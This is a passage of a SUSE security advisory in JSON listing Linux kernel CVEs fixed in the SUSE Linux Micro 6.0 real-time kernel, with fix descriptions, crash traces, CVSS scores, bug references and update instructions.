0x17ffffc00000c1(locked|waiters|head|node=0|zone=2|lastcpupid=0x1fffff)\n page_type: f4(hugetlb)\n page dumped because: still mapped when deleted\n CPU: 1 UID: 0 PID: 395 Comm: hugetlb Not tainted 6.17.0-rc5-00044-g7aac71907bde-dirty #484 NONE\n Hardware name: QEMU Ubuntu 24.04 PC (i440FX + PIIX, 1996), BIOS 0.0.0 02/06/2015\n Call Trace:\n \u003cTASK\u003e\n dump_stack_lvl+0x4f/0x70\n filemap_unaccount_folio+0xc4/0x1c0\n __filemap_remove_folio+0x38/0x1c0\n filemap_remove_folio+0x41/0xd0\n remove_inode_hugepages+0x142/0x250\n hugetlbfs_fallocate+0x471/0x5a0\n vfs_fallocate+0x149/0x380\n\nHold folio lock before checking if the folio is mapped to avold race with\nmigration.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40006",
"url": "https://www.suse.com/security/cve/CVE-2025-40006"
},
{
"category": "external",
"summary": "SUSE Bug 1252342 for CVE-2025-40006",
"url": "https://bugzilla.suse.com/1252342"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-40006"
},
{
"cve": "CVE-2025-40024",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40024"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nvhost: Take a reference on the task in struct vhost_task.\n\nvhost_task_create() creates a task and keeps a reference to its\ntask_struct. That task may exit early via a signal and its task_struct\nwill be released.\nA pending vhost_task_wake() will then attempt to wake the task and\naccess a task_struct which is no longer there.\n\nAcquire a reference on the task_struct while creating the thread and\nrelease the reference while the struct vhost_task itself is removed.\nIf the task exits early due to a signal, then the vhost_task_wake() will\nstill access a valid task_struct. The wake is safe and will be skipped\nin this case.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40024",
"url": "https://www.suse.com/security/cve/CVE-2025-40024"
},
{
"category": "external",
"summary": "SUSE Bug 1252686 for CVE-2025-40024",
"url": "https://bugzilla.suse.com/1252686"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-40024"
},
{
"cve": "CVE-2025-40033",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40033"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nremoteproc: pru: Fix potential NULL pointer dereference in pru_rproc_set_ctable()\n\npru_rproc_set_ctable() accessed rproc-\u003epriv before the IS_ERR_OR_NULL\ncheck, which could lead to a null pointer dereference. Move the pru\nassignment, ensuring we never dereference a NULL rproc pointer.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40033",
"url": "https://www.suse.com/security/cve/CVE-2025-40033"
},
{
"category": "external",
"summary": "SUSE Bug 1252824 for CVE-2025-40033",
"url": "https://bugzilla.suse.com/1252824"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-40033"
},
{
"cve": "CVE-2025-40042",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40042"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ntracing: Fix race condition in kprobe initialization causing NULL pointer dereference\n\nThere is a critical race condition in kprobe initialization that can lead to\nNULL pointer dereference and kernel crash.\n\n[1135630.084782] Unable to handle kernel paging request at virtual address 0000710a04630000\n...\n[1135630.260314] pstate: 404003c9 (nZcv DAIF +PAN -UAO)\n[1135630.269239] pc : kprobe_perf_func+0x30/0x260\n[1135630.277643] lr : kprobe_dispatcher+0x44/0x60\n[1135630.286041] sp : ffffaeff4977fa40\n[1135630.293441] x29: ffffaeff4977fa40 x28: ffffaf015340e400\n[1135630.302837] x27: 0000000000000000 x26: 0000000000000000\n[1135630.312257] x25: ffffaf029ed108a8 x24: ffffaf015340e528\n[1135630.321705] x23: ffffaeff4977fc50 x22: ffffaeff4977fc50\n[1135630.331154] x21: 0000000000000000 x20: ffffaeff4977fc50\n[1135630.340586] x19: ffffaf015340e400 x18: 0000000000000000\n[1135630.349985] x17: 0000000000000000 x16: 0000000000000000\n[1135630.359285] x15: 0000000000000000 x14: 0000000000000000\n[1135630.368445] x13: 0000000000000000 x12: 0000000000000000\n[1135630.377473] x11: 0000000000000000 x10: 0000000000000000\n[1135630.386411] x9 : 0000000000000000 x8 : 0000000000000000\n[1135630.395252] x7 : 0000000000000000 x6 : 0000000000000000\n[1135630.403963] x5 : 0000000000000000 x4 : 0000000000000000\n[1135630.412545] x3 : 0000710a04630000 x2 : 0000000000000006\n[1135630.421021] x1 : ffffaeff4977fc50 x0 : 0000710a04630000\n[1135630.429410] Call trace:\n[1135630.434828] kprobe_perf_func+0x30/0x260\n[1135630.441661] kprobe_dispatcher+0x44/0x60\n[1135630.448396] aggr_pre_handler+0x70/0xc8\n[1135630.454959] kprobe_breakpoint_handler+0x140/0x1e0\n[1135630.462435] brk_handler+0xbc/0xd8\n[1135630.468437] do_debug_exception+0x84/0x138\n[1135630.475074] el1_dbg+0x18/0x8c\n[1135630.480582] security_file_permission+0x0/0xd0\n[1135630.487426] vfs_write+0x70/0x1c0\n[1135630.493059] ksys_write+0x5c/0xc8\n[1135630.498638] __arm64_sys_write+0x24/0x30\n[1135630.504821] el0_svc_common+0x78/0x130\n[1135630.510838] el0_svc_handler+0x38/0x78\n[1135630.516834] el0_svc+0x8/0x1b0\n\nkernel/trace/trace_kprobe.c: 1308\n0xffff3df8995039ec \u003ckprobe_perf_func+0x2c\u003e: ldr x21, [x24,#120]\ninclude/linux/compiler.h: 294\n0xffff3df8995039f0 \u003ckprobe_perf_func+0x30\u003e: ldr x1, [x21,x0]\n\nkernel/trace/trace_kprobe.c\n1308: head = this_cpu_ptr(call-\u003eperf_events);\n1309: if (hlist_empty(head))\n1310: \treturn 0;\n\ncrash\u003e struct trace_event_call -o\nstruct trace_event_call {\n ...\n [120] struct hlist_head *perf_events; //(call-\u003eperf_event)\n ...\n}\n\ncrash\u003e struct trace_event_call ffffaf015340e528\nstruct trace_event_call {\n ...\n perf_events = 0xffff0ad5fa89f088, //this value is correct, but x21 = 0\n ...\n}\n\nRace Condition Analysis:\n\nThe race occurs between kprobe activation and perf_events initialization:\n\n CPU0 CPU1\n ==== ====\n perf_kprobe_init\n perf_trace_event_init\n tp_event-\u003eperf_events = list;(1)\n tp_event-\u003eclass-\u003ereg (2)\u003c- KPROBE ACTIVE\n Debug exception triggers\n ...\n kprobe_dispatcher\n kprobe_perf_func (tk-\u003etp.flags \u0026 TP_FLAG_PROFILE)\n head = this_cpu_ptr(call-\u003eperf_events)(3)\n (perf_events is still NULL)\n\nProblem:\n1. CPU0 executes (1) assigning tp_event-\u003eperf_events = list\n2. CPU0 executes (2) enabling kprobe functionality via class-\u003ereg()\n3. CPU1 triggers and reaches kprobe_dispatcher\n4. CPU1 checks TP_FLAG_PROFILE - condition passes (step 2 completed)\n5. CPU1 calls kprobe_perf_func() and crashes at (3) because\n call-\u003eperf_events is still NULL\n\nCPU1 sees that kprobe functionality is enabled but does not see that\nperf_events has been assigned.\n\nAdd pairing read an\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40042",
"url": "https://www.suse.com/security/cve/CVE-2025-40042"
},
{
"category": "external",
"summary": "SUSE Bug 1252861 for CVE-2025-40042",
"url": "https://bugzilla.suse.com/1252861"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-40042"
},
{
"cve": "CVE-2025-40053",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40053"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: dlink: handle copy_thresh allocation failure\n\nThe driver did not handle failure of `netdev_alloc_skb_ip_align()`.\nIf the allocation failed, dereferencing `skb-\u003eprotocol` could lead to\na NULL pointer dereference.\n\nThis patch tries to allocate `skb`. If the allocation fails, it falls\nback to the normal path.\n\nTested-on: D-Link DGE-550T Rev-A3",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40053",
"url": "https://www.suse.com/security/cve/CVE-2025-40053"
},
{
"category": "external",
"summary": "SUSE Bug 1252808 for CVE-2025-40053",
"url": "https://bugzilla.suse.com/1252808"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-40053"
},
{
"cve": "CVE-2025-40081",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40081"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nperf: arm_spe: Prevent overflow in PERF_IDX2OFF()\n\nCast nr_pages to unsigned long to avoid overflow when handling large\nAUX buffer sizes (\u003e= 2 GiB).",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40081",
"url": "https://www.suse.com/security/cve/CVE-2025-40081"
},
{
"category": "external",
"summary": "SUSE Bug 1252776 for CVE-2025-40081",
"url": "https://bugzilla.suse.com/1252776"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-40081"
},
{
"cve": "CVE-2025-40097",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40097"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nALSA: hda: Fix missing pointer check in hda_component_manager_init function\n\nThe __component_match_add function may assign the \u0027matchptr\u0027 pointer\nthe value ERR_PTR(-ENOMEM), which will subsequently be dereferenced.\n\nThe call stack leading to the error looks like this:\n\nhda_component_manager_init\n|-\u003e component_match_add\n |-\u003e component_match_add_release\n |-\u003e __component_match_add ( ... ,**matchptr, ... )\n |-\u003e *matchptr = ERR_PTR(-ENOMEM); // assign\n|-\u003e component_master_add_with_match( ... match)\n |-\u003e component_match_realloc(match, match-\u003enum); // dereference\n\nAdd IS_ERR() check to prevent the crash.\n\nFound by Linux Verification Center (linuxtesting.org) with SVACE.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40097",
"url": "https://www.suse.com/security/cve/CVE-2025-40097"
},
{
"category": "external",
"summary": "SUSE Bug 1252900 for CVE-2025-40097",
"url": "https://bugzilla.suse.com/1252900"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-40097"
},
{
"cve": "CVE-2025-40099",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40099"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ncifs: parse_dfs_referrals: prevent oob on malformed input\n\nMalicious SMB server can send invalid reply to FSCTL_DFS_GET_REFERRALS\n\n- reply smaller than sizeof(struct get_dfs_referral_rsp)\n- reply with number of referrals smaller than NumberOfReferrals in the\nheader\n\nProcessing of such replies will cause oob.\n\nReturn -EINVAL error on such replies to prevent oob-s.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40099",
"url": "https://www.suse.com/security/cve/CVE-2025-40099"
},
{
"category": "external",
"summary": "SUSE Bug 1252911 for CVE-2025-40099",
"url": "https://bugzilla.suse.com/1252911"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-40099"
},
{
"cve": "CVE-2025-40102",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40102"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nKVM: arm64: Prevent access to vCPU events before init\n\nAnother day, another syzkaller bug. KVM erroneously allows userspace to\npend vCPU events for a vCPU that hasn\u0027t been initialized yet, leading to\nKVM interpreting a bunch of uninitialized garbage for routing /\ninjecting the exception.\n\nIn one case the injection code and the hyp disagree on whether the vCPU\nhas a 32bit EL1 and put the vCPU into an illegal mode for AArch64,\ntripping the BUG() in exception_target_el() during the next injection:\n\n kernel BUG at arch/arm64/kvm/inject_fault.c:40!\n Internal error: Oops - BUG: 00000000f2000800 [#1] SMP\n CPU: 3 UID: 0 PID: 318 Comm: repro Not tainted 6.17.0-rc4-00104-g10fd0285305d #6 PREEMPT\n Hardware name: linux,dummy-virt (DT)\n pstate: 21402009 (nzCv daif +PAN -UAO -TCO +DIT -SSBS BTYPE=--)\n pc : exception_target_el+0x88/0x8c\n lr : pend_serror_exception+0x18/0x13c\n sp : ffff800082f03a10\n x29: ffff800082f03a10 x28: ffff0000cb132280 x27: 0000000000000000\n x26: 0000000000000000 x25: ffff0000c2a99c20 x24: 0000000000000000\n x23: 0000000000008000 x22: 0000000000000002 x21: 0000000000000004\n x20: 0000000000008000 x19: ffff0000c2a99c20 x18: 0000000000000000\n x17: 0000000000000000 x16: 0000000000000000 x15: 00000000200000c0\n x14: 0000000000000000 x13: 0000000000000000 x12: 0000000000000000\n x11: 0000000000000000 x10: 0000000000000000 x9 : 0000000000000000\n x8 : ffff800082f03af8 x7 : 0000000000000000 x6 : 0000000000000000\n x5 : ffff800080f621f0 x4 : 0000000000000000 x3 : 0000000000000000\n x2 : 000000000040009b x1 : 0000000000000003 x0 : ffff0000c2a99c20\n Call trace:\n exception_target_el+0x88/0x8c (P)\n kvm_inject_serror_esr+0x40/0x3b4\n __kvm_arm_vcpu_set_events+0xf0/0x100\n kvm_arch_vcpu_ioctl+0x180/0x9d4\n kvm_vcpu_ioctl+0x60c/0x9f4\n __arm64_sys_ioctl+0xac/0x104\n invoke_syscall+0x48/0x110\n el0_svc_common.constprop.0+0x40/0xe0\n do_el0_svc+0x1c/0x28\n el0_svc+0x34/0xf0\n el0t_64_sync_handler+0xa0/0xe4\n el0t_64_sync+0x198/0x19c\n Code: f946bc01 b4fffe61 9101e020 17fffff2 (d4210000)\n\nReject the ioctls outright as no sane VMM would call these before\nKVM_ARM_VCPU_INIT anyway. Even if it did the exception would\u0027ve been\nthrown away by the eventual reset of the vCPU\u0027s state.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40102",
"url": "https://www.suse.com/security/cve/CVE-2025-40102"
},
{
"category": "external",
"summary": "SUSE Bug 1252919 for CVE-2025-40102",
"url": "https://bugzilla.suse.com/1252919"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 0,
"baseSeverity": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:N",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-40102"
},
{
"cve": "CVE-2025-40103",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40103"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nsmb: client: Fix refcount leak for cifs_sb_tlink\n\nFix three refcount inconsistency issues related to `cifs_sb_tlink`.\n\nComments for `cifs_sb_tlink` state that `cifs_put_tlink()` needs to be\ncalled after successful calls to `cifs_sb_tlink()`. Three calls fail to\nupdate refcount accordingly, leading to possible resource leaks.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40103",
"url": "https://www.suse.com/security/cve/CVE-2025-40103"
},
{
"category": "external",
"summary": "SUSE Bug 1252924 for CVE-2025-40103",
"url": "https://bugzilla.suse.com/1252924"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.3,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
